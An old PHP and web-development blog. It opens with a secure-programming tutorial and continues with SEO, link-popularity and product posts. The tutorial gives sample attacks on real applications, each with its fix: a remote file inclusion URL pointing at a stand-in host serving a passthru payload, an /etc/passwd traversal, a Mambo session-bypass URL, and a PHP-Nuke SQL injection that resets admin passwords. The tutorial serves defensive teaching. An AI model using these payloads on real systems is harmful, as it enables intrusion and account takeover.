Nikhil Sheth

Web World

This site is for PHP, MySQL, Flash... in short, for any web-related stuff.

Tuesday, June 07, 2005

Secure Programming in PHP

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand -- but they can.

Dangers

Files

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

Example

A site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL: http://example.com/page.php?i=aboutus.html The variable $i obviously contains the name of the file to be included. When you see a URL like this, a lot of questions should come to your mind:
  • Has the programmer considered directory traversals like i=../../../etc/passwd?
  • Does he check for the .html extension?
  • Does he use fopen() to include the files?
  • Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access to. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this: http://example.com/page.php?i=http://evilhacker.org/exec.html where exec.html contains a couple of lines of code:

<?php
passthru('id');
passthru('ls -al /etc');
passthru('ping -c 1 evilhaxor.org');
passthru('echo You have been hax0red | mail root');
?>
I am sure you get the idea. A lot of bad things can be done from here.

Global Variables

Per default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.
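As a minimal sketch of the idea (the parameter name "page" is hypothetical), reading the request array directly makes the origin of the value explicit:

<?php
// Read the parameter from the GET array only -- a value smuggled in
// via a cookie or POST body will not be picked up by accident.
if (isset($HTTP_GET_VARS['page'])) {
    $page = $HTTP_GET_VARS['page'];
} else {
    die("Missing parameter.");
}
?>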

Example

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified. Under the 'admin/' directory, index.php checks whether the password matches the one in the database after posting the form:

<?php
if ($dbpass == $pass) {
    session_register("myname");
    session_register("fullname");
    session_register("userid");
    header("Location: index2.php");
}
?>
When the passwords match, the variables $myname, $fullname and $userid are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:

<?php
if (!$PHPSESSID) {
    header("Location: index.php");
    exit(0);
} else {
    session_start();
    if (!$myname) session_register("myname");
    if (!$fullname) session_register("fullname");
    if (!$userid) session_register("userid");
}
?>
If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL: http://example.ch/admin/index2.php?PHPSESSID=1&myname=admin&fullname=joey&userid=admin The GET variables $PHPSESSID, $myname, $fullname and $userid are created as global variables per default. So when you look at the if-else structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorizing and identifying the user can be set to anything you want. The database has not even been queried. A quick fix for this problem -- by far not the perfect one -- would be to check for $HTTP_SESSION_VARS['userid'] or $_SESSION['userid'] (PHP >= 4.1.0) instead of $userid. If you are serious about making secure web applications, read chapter 3.3.
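A minimal sketch of that quick fix, using the variable names from the example above: trust only the value stored server-side in the session data, never a global that could have been injected via GET.

<?php
session_start();
// $HTTP_SESSION_VARS is filled from the server-side session store,
// so a "userid" GET parameter cannot overwrite it.
if (!isset($HTTP_SESSION_VARS['userid'])) {
    header("Location: index.php");
    exit(0);
}
?>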

SQL

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

Example

The following bug in PHP-Nuke 5.x was reported to the Bugtraq mailing list on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable. The PHP-Nuke developers decided to add the "nuke" prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. Per default, $prefix = "nuke"; is defined in the configuration file config.php. Let us now look at a few lines from the script article.php:

<?php
if (!isset($mainfile)) {
    include("mainfile.php");
}
if (!isset($sid) && !isset($tid)) {
    exit();
}
?>
And a bit further down: the SQL query.

<?php
mysql_query("UPDATE ".$prefix."_stories SET counter=counter+1 where sid=$sid");
?>
To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following query will set all admin passwords to '1': http://example.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.authors%20set%20pwd=1%23 The query now looks like this:

UPDATE nuke.nuke_authors set pwd=1#_stories SET counter=counter+1 where sid=$sid

Of course, anything after # will be considered as a comment and will be ignored.
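A sketch of how this query could have been hardened, assuming the prefix is taken only from config.php and never from the request: build the table name from trusted configuration and cast $sid to an integer.

<?php
// $prefix comes from config.php only -- never from user input.
$prefix = "nuke";
// Casting to int neutralizes any SQL smuggled in via the sid parameter.
$sid = (int)$HTTP_GET_VARS['sid'];
mysql_query("UPDATE ".$prefix."_stories SET counter=counter+1 where sid=$sid");
?>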

Secure Programming

Awareness

Before taking any technical measures, you have to realize that you cannot trust any input from external sources. Whether it is a GET or POST parameter or even a cookie, it can be set to anything. User-side JavaScript form checks will not make any difference. ;)

Check User Variables

Every external variable has to be verified. In many cases you can just use type casting. For example, when you pass a database table id as a GET parameter, the following line would do the trick: $id = (int)$HTTP_GET_VARS['id']; or $id = (int)$_GET['id']; /* (PHP >= 4.1.0) */ Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you get the basic idea. As an example, the variable $i from chapter 2.1 can be verified with this expression:

<?php
if (ereg("^[a-z]+\.html$", $i)) {
    echo "Good!";
} else {
    die("Try hacking somebody else's site.");
}
?>

This script will only continue when the $i variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details, but I strongly recommend the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).
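For readers on newer PHP versions: the same check can be written with the Perl-compatible regex functions, which later superseded ereg(). A minimal sketch of the equivalent test:

<?php
// preg_match() takes a delimited pattern; \. matches a literal dot.
if (preg_match('/^[a-z]+\.html$/', $i)) {
    echo "Good!";
} else {
    die("Try hacking somebody else's site.");
}
?>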

Master the Global Variable Scope

I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions. Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent the security holes described in chapter 2.2. This simple example will show you the difference:

Bad:

<?php
function session_auth_check() {
    global $auth;
    if (!$auth) {
        die("Authorization required.");
    }
}
?>

Good:

<?php
function session_auth_check() {
    if (!$_SESSION['auth']) {
        die("Authorization required.");
    }
}
?>

Logging

In a production environment it is a good idea to set the error_reporting level to 0. Use the error_log() function to log errors to a file or even alert yourself via e-mail. If you are really concerned about security, you can even do some preventive "intrusion detection". For example, you could send yourself an e-mail alert when somebody plays with GET/POST/Cookie parameters and the regular expression function returns false accordingly.
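A minimal sketch of such a setup, reusing the file-name check from the previous chapter (the log path and admin address are hypothetical):

<?php
// Hide errors from visitors; log them for yourself instead.
error_reporting(0);

// The validation failed: record the suspicious request to a file
// (message type 3) and alert the admin by e-mail (message type 1).
if (!ereg("^[a-z]+\.html$", $i)) {
    error_log("Suspicious parameter: $i\n", 3, "/var/log/php_intrusion.log");
    error_log("Possible intrusion attempt: $i", 1, "admin@example.com");
    die("Invalid request.");
}
?>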

Conclusion

Programming securely definitely needs a little more time than the "Wow, it works!" technique. But as you can see by the examples, you cannot afford to ignore security. I hope I could make you think about how to improve your existing applications and especially how to change your programming practice in the future. Happy hacking!

Monday, June 06, 2005

MySQL GUI : Navicat 2005 is now available

Navicat 2005 (MySQL GUI) is a MySQL database management tool which can convert Excel spreadsheets/MS Access to MySQL databases, eliminating time-consuming data entry and the errors that accompany it. It uses a Microsoft Access-like interface and comes with a comprehensive user manual.

Other useful features include Batch Job Schedule, Data Synchronization, Import/Export wizard, Visual query builder and Visual report builder. More than 100 new features and improvements have been added, including the ability to import data from ODBC databases, create Batch Job Schedules, synchronize data, etc. Additionally, it supports MySQL 5.0 and above (including support for Stored Procedures and Views).

Navicat 2005 is available on three OS platforms - Windows, Mac OS X and Linux.

Free trial version - http://www.navicat.com/download.html

Online Demo - http://www.navicat.com

Navicat Support Center - http://support.navicat.com

Navicat 2005 for Windows - http://www.navicat.com/detail.html

Navicat 2005 for Mac OS X - http://www.navicat.com/mac_detail.html

Navicat 2005 for Linux - http://www.navicat.com/linux_detail.html

Saturday, June 04, 2005

Google Sitemaps Program - Take Advantage


Google recently launched a new program called Google Sitemaps. This program (free, and currently still in beta) is designed to help website owners get their pages crawled by Google.

If you want to take advantage of Google Sitemaps, you need to place a Sitemap-formatted file on your webserver. By doing so you enable Google’s crawlers to find out what pages are present and which have recently changed, and to crawl your site accordingly. Google Sitemaps can help to get more of your web pages crawled and can also enable you to tell Google when contents on your site changes.

This sounds pretty good. However, the problem I see is that in order to get started, you have to install some scripts on your server. Webmasters “should have knowledge of uploading files to their webserver, connecting to their webserver, and running scripts. In addition, Python version 2.2 must be installed on your webserver - check with your web hosting company if you are unsure". Bottom line: you have to be a technical guy, or have a technical guy help you, in order to take advantage of Google Sitemaps. To make people’s life easier, Google also says “If any of these requirements are not met, you can still submit a Sitemap to the Google Sitemaps program in simple text format.".

Here is the link to Google Sitemaps’ FAQ: https://www.google.com/webmasters/sitemaps/docs/en/faq.html. As webmasters and site owners, you might want to take advantage of Google Sitemaps to get more of your web pages crawled, and to get them crawled faster.

Monday, May 30, 2005

Improving the Link Popularity of your site


Link popularity, i.e. the number of sites which are linking to your site, is an increasingly important factor as far as search engine placement is concerned. Other things remaining the same, the more links to your site, the higher its ranking will be.

What is important is not only the number of links to your site, but also the types of sites which are linking to you. A link from a site which is related to yours is more valuable than a link from an unrelated site.

In this article, I explore different methods by which you can improve the link popularity of your site. I start with the methods that you shouldn't bother using, then go on to the moderately effective methods, and then end with the most effective methods you can use to boost the link popularity of your site.


1) Submitting your site to Free For All (FFA) pages

A common misconception among many Internet marketers is that while FFA pages may not directly bring in traffic to your site, they will help to improve the link popularity of your site, and hence, will indirectly bring in traffic through the search engines.

Nothing could be further from the truth. Most FFA pages can contain only a certain number of links at a time. This means that when you submit your site to a FFA page, your site will be placed at the top of the page. However, as more and more people submit their sites to the FFA page, your site will be pushed down, and finally, when it reaches the bottom of the page, it will be removed.

Now, since you can bet that plenty of other people are also submitting their sites to the FFA pages, your site will remain in these pages for only a short span of time. Hence, in order to ensure that the search engines see your site if and when they come to spider the FFA page, you will need to ensure that you submit your site to these FFA pages on a regular basis - at least once a week.

Even if you used an automatic submission program to do it, can you imagine a worse way to spend your time and/or money? Furthermore, many search engines recognize these pages, which contain only links to other sites, as FFA pages and may completely ignore them. And while I haven't yet seen any evidence that submitting to FFA pages will actually penalize your site, there is every possibility that this might happen in the future.

Hence, when it comes to FFA pages, my advice is simple: don't even think about them.

2) Joining Reciprocal Link Services

Some people have recommended that in order to increase the link popularity of your site, you can join some reciprocal link services. The basic idea behind these services is that you add some pages to your site which contain links to other sites which are members of that service, and in exchange, these members will also add pages to their sites which will contain a link to your site. Theoretically, the more members the service has, the greater your link popularity.

However, I have plenty of reservations about using this method to boost the link popularity of your site:

i) Most of these services require that you add a visible graphical or text link from your home page to the pages containing the links. If they require a graphical link, it can completely destroy the general look and feel of your site. Even if they require a text link, how would you feel if a visitor to your site clicked on such a link and found one of your competitors (who is also a member of this service) right at the top of a page?

ii) Most of these services give the same pages containing the links to each of its members, i.e. the pages that you are required to upload to your site are exactly the same as the pages which all the other members of that service are required to upload to their servers. Even the file names of the pages tend to be the same for all the members. Most search engines are now able to detect such duplicate pages in different domains and may either ignore the pages or may even penalize all these domains for spamming.


iii) Instead of linking only related sites with each other, most of these services link all the members with each other. This means that lots of unrelated sites will be linking to your site. As I mentioned before, links from unrelated sites are simply not as valuable as links from related sites.


Hence, I don't recommend that you join any reciprocal link programs.


3) Exchanging links with other webmasters

Another way of improving the link popularity of your site is to exchange links with other webmasters who have sites which are related to yours, but are not direct competitors. Here's how you can do it: First, open a database program like Microsoft Access and create a new table containing fields like FirstName, LastName, EmailAddress, URL etc. Then, make a list of the sites belonging to your competitors. Then, go to AltaVista, and type in the following in the search box:

link:somesite.com -url:somesite.com


where somesite.com is the domain name of one of your competitors. This will give you a list of all the sites which are linking to that competitor. Then, find out in what context a particular site has linked to your competitor. If this site is an affiliate of your competitor, then your chance of getting a link from this site is limited, unless you offer an even better affiliate program. However, if you find that this site has a Links page which contains links to other sites, one of which is a link to your competitor, then it is an excellent prospect for exchanging links. Find out the name and email address of the webmaster of the site and add them to your database. In this way, go through all the sites which are linking to your competitors, locate those sites which you think may want to exchange links with you, and build up your database.
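If you prefer MySQL to Access (this blog's usual toolkit), the same prospects table can be sketched like this; the table name and field sizes are just illustrative, the field names are the ones suggested above:

```sql
-- Hypothetical table for tracking link-exchange prospects.
CREATE TABLE link_prospects (
    FirstName    VARCHAR(50),
    LastName     VARCHAR(50),
    EmailAddress VARCHAR(100),
    URL          VARCHAR(255)
);
```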

Once you have done that, create a Links page in your site, and add the URLs of these sites to the Links page. Then, send an email to these webmasters, introduce yourself and your site, congratulate them on building an excellent web site, tell them that you have already added a link to their sites from yours, and then ask them whether they would be kind enough to add a link to your site. In your email, emphasize the fact that exchanging links in this way will be mutually beneficial for both of you because it will help both of you drive traffic to your sites. Wait for a month or so to see the response. Some webmasters will agree to link to you. Others will simply not respond. After a month, remove the links to those sites who are not interested in exchanging links and using the methods outlined above, try to locate more sites with which to exchange links.

When you send the email to the webmasters, make sure that you personalize each email. Don't begin every email with "Hello Webmaster", begin with "Hello Mike". If you want, you can use email merge programs to automatically personalize each email. You can check out some email merge programs by going to http://download.cnet.com and searching for "email merge" (without the quotes).

The main problem with this method of improving the link popularity of your site is that it takes a lot of time. You may find that the number of links you manage to get just does not justify the time that you spend over it. The best way to automate the whole process is to use a program called Zeus. Zeus will allow you to locate and exchange links with sites that are related to yours and manage those links on an ongoing basis in a fraction of the time it would take for you to do it manually. You can download a free trial version of Zeus at the following URL:

http://www.1stSearchRanking.com/t.cgi?3319&zeus/

While the program does take a while to get used to, the results that you can obtain with it are simply phenomenal. I highly recommend that you download the free trial version and try it out.

Another thing that you can do is to mention in your Links page that you are willing to exchange links with other web sites. This allows other webmasters who come to your web site to propose a link exchange.

4) Starting an Awards Program

A moderately effective method of improving the link popularity of your site is to start an awards program. You can have web sites which are related to yours apply for an award from your site. The sites which win the award get the chance to display the logo for your award. This logo is linked to your site, preferably to a page which contains more information on the award.


If you publish a newsletter, consider declaring the winners in your newsletter. You can also perform a review of the winners' sites in your newsletter. This adds useful content to your newsletter and also gives more webmasters the incentive to apply for your award, since you may review their sites in your newsletter. This also gives them the incentive to subscribe to your newsletter to see if they win the award.

Make sure that you give awards to only those sites which deserve to win. If you give your award to sites which don't deserve it, your award will have little credibility, which will, in turn, hurt the credibility of your company. Furthermore, make sure that the logo you design for the award looks professional. If it doesn't, not many webmasters will want to display it in their sites.

5) Giving testimonials

This may sound a bit unusual, but giving testimonials for products or services which you find useful can be another moderately effective way of improving the link popularity of your site. If you really like a product, simply write to the company and tell them why you liked the product so much and how it has helped you. Chances are, the company will write back to you to thank you for your comments and will ask you for permission to display your comments in their web site. Tell the company that you have no problems if they publish your comments, but request them to add a link to your site along with the testimonial. There is every possibility that the company will agree since publishing the URL of your web site gives more credibility to the testimonial.

Of course, please don't go about giving testimonials to every company you can locate just because it will improve your link popularity :-)

6) Posting to Message Boards and Discussion Lists


Another moderately effective method of increasing the link popularity of your site is to post to online message boards. At the end of every message that you post, you can sign off by mentioning your name and the URL of your web site. If the message board allows it, you can even include a short promotional blurb about your site at the end of your posts. However, make sure that the individual messages that are posted to that message board are archived in static HTML pages (i.e. the URLs for the individual messages should not contain a "?"). Otherwise, the search engines will consider these pages to be dynamic pages and may not spider these pages and hence, will not be able to find your link.


Email based discussion lists which are archived on the web in static HTML pages can also be used to boost the link popularity of your site in a similar manner. In this case, the signature file that you use with your email program should contain the URL for your web site.



7) Starting a Link Contest


A good method of improving the link popularity of your site is to give away prizes to other webmasters if they link to you. The prizes that you give out should ideally be something which other webmasters will find valuable enough to want to link to you, but which do not cost you too much. For instance, if you publish a newsletter, and have unsold ad inventory, you can give away some free advertisements in your newsletter to the winners. If you sell a software (or an ebook), you can give away a free copy of your software or ebook to the winners, since it doesn't cost you anything to produce an additional copy of digital goods like software and ebooks.


Link contests work best if you run the contest on a continuous basis and if you declare new winners frequently. If you run the contest for a few months, and then stop it, the webmasters who had linked to you will all remove their links. However, if you run it on a continuous basis, and declare new winners every month or so, the webmasters will have the incentive to keep their links to your site.


Also, make sure that you require all participants to have a link to your site either in their home page, or in an internal page of their site which is linked to their home page. Also ensure that the page which contains the link is no more than two levels deep from their home page (i.e. it should not take more than two clicks to go from the home page to the page containing the link). If they don't do this, the search engine spiders may not index the page which contains the link to your site, and hence, may not find your link.



8) Writing articles and allowing them to be re-published


This is by far one of the best ways of improving the link popularity of your site, and one of my favorites. Whenever I write an article on search engine placement, I first publish it in my newsletter and then I publish the article in my site as a separate web page. I also submit it to the following article submission sites:


http://www.ezinearticles.com/add_url.html
http://www.ideamarketers.com
http://www.marketing-seek.com/articles/submit.shtml
http://certificate.net/wwio/ideas.shtml
http://www.web-source.net/articlesub.htm


Many webmasters and ezine publishers frequent these article directories in search of articles. Submitting my articles to these directories gives them the opportunity of re-publishing my articles. While I have had some success with each of the above directories, by far the best among them is the ezinearticles.com directory.


Now, at the end of each article, I mention that people are free to re-publish the article as long as they include my resource box (i.e. my bio) at the end of the article. I always include the URL of my site in the resource box. This means that whenever someone publishes one of my articles in his/her web site, I have another site linking to my site. Also, many ezine publishers archive their ezines in their web sites. If they have re-published my article in a particular issue, I again get a link.


Writing articles is also an excellent viral marketing tool. As some webmasters and ezine publishers publish my articles, other webmasters and ezine publishers will read my article. Some of them, in turn, will publish my article, which will again be read by other webmasters and ezine publishers, some of whom will publish it... and so on.


Also, since only web sites related to mine would be interested in publishing my articles, all these links tend to come from related sites, which, as I mentioned earlier, are more valuable than links from unrelated sites.


Writing articles, of course, has another very important benefit - if you write good articles, it makes you known as an expert in your field. This helps to improve your credibility, which makes people more comfortable about buying your products or services.


Some notes about writing articles:


i) I have learnt through experience that some webmasters will publish other people's articles and will display the complete resource box but will not link to the URL mentioned in the resource box. In order to prevent this, you need to explicitly state that the article can be published only if the URL mentioned in the resource box is linked to your site.


ii) Your resource box should not be too long - it should be no more than 6 lines long, formatted at 65 characters per line. Otherwise, other webmasters and ezine publishers will hesitate to publish your article.



9) Starting your own affiliate program


This is another excellent way by which you can improve the link popularity of your site. When you have your own affiliate program, you give other webmasters the incentive to link to you. In this case too, since most of these web sites will be related to the industry in which you are operating, these links will be more valuable than links from unrelated sites.


Now, when you start your affiliate program, you need to decide whether you want to run the program yourself, or whether you want to outsource it from a third party. While outsourcing your affiliate program has a number of benefits, doing so will not help you improve the link popularity of your site, because affiliates are going to link to the third party's site. In order to improve the link popularity of your site, you need to ensure that the affiliate links are pointing to your domain.


The affiliate program software that I highly recommend and have used for the affiliate program of our search engine positioning services is Kowabunga Technologies' My Affiliate Program, which is available at http://www.1stSearchRanking.com/t.cgi?3319&affiliateprogram/ . Although this software is hosted in a domain owned by Kowabunga Technologies, they give you the option of having the affiliate links pointing to your own domain.



10) Submitting to the directories


This is by far the most important step as far as improving the link popularity of your site is concerned. As I mentioned before, what is important is not only the number of links to your site, but also the quality of the links to your site. No links are as important as links from some of the major directories like Yahoo!, the Open Directory etc. However, Yahoo! currently requires a payment of $299 per year in order to list any commercial site. Paying them $299 per year just to improve your link popularity is probably not cost effective. But, the Open Directory is free, and you should definitely get your site listed in the Open Directory.


Also, you should submit your site to as many of the smaller directories as possible. You can get a list of such directories at

http://dir.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/Searching_the_Web/Search_Engines_and_Directories/



11) Analyzing the quality of links


As mentioned earlier, what is important is not only the number of sites linking to you, but also the quality of the links that you have. Until now, there has been no easy way of checking the quality and relevancy of sites that are linking to you or the quality and relevancy of sites that you are thinking of asking for links from. You could have done it manually, but it would take a tremendous amount of time. However, a new software product called Optilink automates this process to a large extent. In addition to doing an excellent job in helping you determine the quality and relevancy of sites that already link to you or might link to you, it also does the following:


i) analyzes the link structures of your top ranking competitors and tells you why they rank well, so that you can emulate the same tactics that your top ranking competitors are using.


ii) allows you to do "what if" analysis - it tells you what sort of rankings you can expect if you adopt a particular linking strategy.


iii) monitors the sites that you have exchanged links with to ensure that they are still linking to you and are linking to you the way you want them to.


If you are thinking of improving the link popularity of your site, or are already doing so, I highly recommend that you obtain this product before you proceed. You can find more information on Optilink at:


http://www.1stSearchRanking.com/t.cgi?3319&optilink/

Creating Keyword Rich Pages


Once you have established the keywords for which you should optimize your site, it is time to figure out how you can get a high ranking in the search engines for those keywords. The solution is to create Keyword Rich Pages (KRPs) - pages which provide good content and in which a particular keyword is repeated a number of times so that the page gets a top ranking for that keyword.

This article is focused on how you should create these KRPs. I am assuming you have a working knowledge of the different HTML tags like the Title tag, the Meta Description tag, the Meta Keywords tag, the Heading tags, the Alt Tag etc. If you don't, just go to http://www.utoronto.ca/webdocs/HTMLdocs/NewHTML/htmlindex.html for a good introduction to such HTML tags.


Now, let us assume that your company sells packaged tours to Australia, and that you are targeting the keyword "travel to australia". Here's how you create the KRPs:


The Title Tag:


The first and most important tag to consider is the Title tag. You should always begin the Title tag with the keyword that you are targeting. Also remember that the search engines are going to display the Title tag while they are displaying the results of a search. Hence, you need to make the Title tag attractive to humans as well.


Here is one Title tag that I may have used: "Travel to Australia and discover its scenic beauty". Have a look at the Title tag - it uses the keyword right at the beginning and also tells people how beautiful a place Australia is.


Of course, all Titles need not be like the one I used. The Title that you use depends on the subject matter of your site. However, you should follow all the general rules that I have outlined here.
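In HTML, this is simply the page's title element. A minimal sketch, using the sample title suggested above:

```html
<head>
  <!-- Target keyword "travel to australia" placed at the very start -->
  <title>Travel to Australia and discover its scenic beauty</title>
</head>
```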


Meta Description Tag:


The Meta Description tag is used by many search engines to provide a short description of the page that is listed in the search results. Hence, like the Title tag, it is important that the Meta Description tag be keyword rich as well as attractive to humans.


The rules for the Meta Description are more or less the same as those for the Title tag. However, the content of this tag will generally be longer than that of the Title. Here's what I may have used in the Meta Description tag:


"Travel to Australia - We take care of all the details of your trip so that you can travel with complete peace of mind."


Note how this description repeats the keyword and also the benefit that it stresses - it says that the customer will be able to travel without having to worry about the intricate details of the trip - you will take care of them.
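As a sketch, the description above would sit in a Meta tag in the page's head like this:

```html
<!-- Keyword-rich description, shown by many engines in their search results -->
<meta name="description"
      content="Travel to Australia - We take care of all the details of your trip so that you can travel with complete peace of mind.">
```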


Meta Keywords Tag:


The Meta Keywords tag has become less and less important as far as search engine optimization is concerned. In fact, you can get top rankings without having anything in the Meta Keywords tag at all. However, just to be on the safe side, you would want to include some keywords in the Meta Keywords tag. You should also include some of the common upper/lower case variations of the keyword. The rules for the Meta Keywords tag are pretty simple - don't repeat any keyword in the Meta Keywords tag more than three times and don't repeat any keyword one after the other. Here's what I may have used in the Meta Keywords tag:


"Travel to Australia, tourism, travel to Australia, Down Under, TRAVEL TO AUSTRALIA"


Note how I have introduced "tourism" and "Down Under" just to separate the different instances of the keyword.
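In markup, the list above goes into the Meta Keywords tag; note that no variation appears more than three times and no two instances of the keyword sit back to back:

```html
<meta name="keywords"
      content="Travel to Australia, tourism, travel to Australia, Down Under, TRAVEL TO AUSTRALIA">
```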


Body of the page:


Now we come to the actual body of the page. Begin by getting hold of a nice (but not too large) picture which is applicable for the page that you are creating. In the present case, I might include a picture of the lotus shaped Sydney Opera House. Place this picture at the top of the page. In the Alt tag for the picture, just mention your target keyword once, i.e. the Alt tag would be "Travel to Australia". You can include other words in the Alt tag, but it should start with the keyword you are targeting.


Once you've put up the picture, it is time to create a Heading for your page. Use the H1 tag to do so. Again, in the H1 tag, mention your target keyword once, i.e. like the Alt tag for the picture, the H1 tag could be "Travel to Australia". Again, like the Alt tag, you can include other words in the heading, but the heading should start with the keyword you are targeting.
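Put together, the picture and heading described above might be sketched as follows (the image file name is invented for illustration):

```html
<!-- Picture at the top of the page; the Alt text starts with the keyword -->
<img src="opera-house.jpg" alt="Travel to Australia - Sydney Opera House">

<!-- Page heading, again beginning with the target keyword -->
<h1>Travel to Australia</h1>
```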


Now it's time to create the actual text of the page. The way you create the text of your page would depend largely on what you want the visitor to do after reading this page.

In some cases, you may simply want the visitor to go to the home page or another specific page in your site after reading this page. In this case, you should write the text in such a way that the visitor is attracted to the page that you are targeting. You would also want to provide links to the home page or the specific page that you are targeting at strategic places in the KRP.

Or, you may want the visitor to click on the link to an affiliate program that you are a member of. In this case, you would stress the benefits that the visitor gets by purchasing the product or service that the affiliate program is selling. You would also want to provide links to the affiliate program at strategic places in the page and/or at the end of the page.

Whatever it is that you want your page to do, there are some general rules to follow:

1. The first thing to remember is that some search engines don't recognize the Meta Description tag. These search engines will often simply take the first few lines of text in the body of your page and display that as the description. Hence, you must ensure that the first few lines of text in your page are attractive to human beings.

2. Ensure that as many sentences as possible in the page contain your target keyword once. The keyword shouldn't just be placed on an ad hoc basis - the way the keyword is placed in every sentence should actually make grammatical sense and the repetition should be such that your human visitors do not feel that you have deliberately repeated a particular phrase throughout the page. This is not only important from the point of view of ensuring that your readers don't get a bad impression of your site, but also from the point of view of search engine optimization - the search engines may penalize your page for spamming if they find that you have randomly repeated the keyword throughout the page. Also, while repeating the keyword in the page, try to repeat the keyword once near the top of the page and once near the bottom.

3. Make sure that your paragraphs are not too long - each paragraph should be no more than 3 or 4 sentences long. This is because people on the web simply don't have the time or the inclination to read long paragraphs.

4. Try to ensure that the page contains links to other pages with the keyword being present in the text under the link. This can often lead to a higher ranking for your page.

5. If possible, link to other pages which have the keyword in the file names. This can again lead to a higher ranking for your page.

6. There is no hard and fast rule regarding the total number of words that should be present in the KRPs. As a rule of thumb, try to ensure that there are between 500-600 words. However, if the number of words falls a bit short of or exceeds this limit, don't worry too much.

Once you have created the page, ensure that the name of the file in which it is saved contains the keyword and that the individual words of the keyword are separated by hyphens. In this case, the name of the file would be travel-to-australia.html. This will get you a higher ranking in the few search engines which give a lot of emphasis on the keyword being present in the file name.

That's it! When you want to target another keyword, simply create another KRP for it using the procedure outlined above.

After you have created the KRPs, you cannot simply upload them to your site and submit them to the search engines. This is because the search engines take a rather dim view of pages which only contain outgoing links to other pages but do not contain any incoming links from other pages. The search engines may penalize sites which have such pages.

What you need to do is to directly or indirectly link the KRPs with your home page. If you are going to create many KRPs for your site, it will be impractical to link the home page directly with all the KRPs as this will needlessly clutter your home page. Hence, what you should do is to create a separate page in your site called a Sitemap page (name it something like sitemap.html). Add links to all the KRPs from the Sitemap page. The text that you use to link to a particular KRP should be the same as the keyword that the KRP is being optimized for. Hence, the link to the travel-to-australia.html file should say "Travel to Australia".

Now, some search engines refuse to spider pages which only contain links to other pages and nothing else. Hence, if the Sitemap page only contains links to the KRPs but contains no other content, the search engines may ignore this page. Hence, what you can do is to add a short description of the content of each of the KRPs after you have added a link to that KRP in the Sitemap page. This ensures that the search engines will not ignore this page.
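A minimal sketch of one Sitemap entry, combining the keyword-as-link-text rule with the short description that keeps the page from being ignored (the description wording is invented for illustration):

```html
<!-- sitemap.html: the link text matches the KRP's target keyword -->
<a href="travel-to-australia.html">Travel to Australia</a><br>
A guide to planning a worry-free packaged tour of Australia.
```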

After doing all this, simply link the home page of your site with the Sitemap page using a text link. Then, submit your home page, the Sitemap page and each of the KRPs to the search engines. When you are submitting these pages, to be on the safe side, make sure that you submit no more than 1 page per day to any search engine - otherwise, you run the risk of some search engines ignoring some of the pages you have submitted. You can submit your site by going to the individual "Add URL" pages of each engine. Or, in order to save time, you can use our free submission tool which helps you submit your site manually to the search engines, without having to go to the individual "Add URL" pages of each engine. The tool is available at http://www.1stSearchRanking.com/t.cgi?3319&submission.htm

Follow all the rules that I have outlined in this article and you can soon see your search engine blues disappear for ever!

Optimization - Free Google tools

There's no doubt that Google has captured the hearts and minds of surfers and webmasters alike in recent years. Google tools have also become a common sight, thanks to the Google Web APIs (http://www.google.com/apis/).

Using tools such as Google Web API (Application Program Interface), software developers can query the billions of pages in Google's databases from their own programs, which has led to some amazing web applications being developed and released to the public.

Here's a selection that I'll be updating from time to time of the more webmaster-oriented tools that can assist with search engine optimization:

http://www.rankpulse.com/
Rank Pulse is an online tool that provides a look at the daily fluctuations of Google results based on the movements of rankings of sites in relation to keywords that the company monitors.

http://www.googlealert.com/
Google Alert can keep track of what the web is saying about a particular person, company or web site.

http://www.webconfs.com/
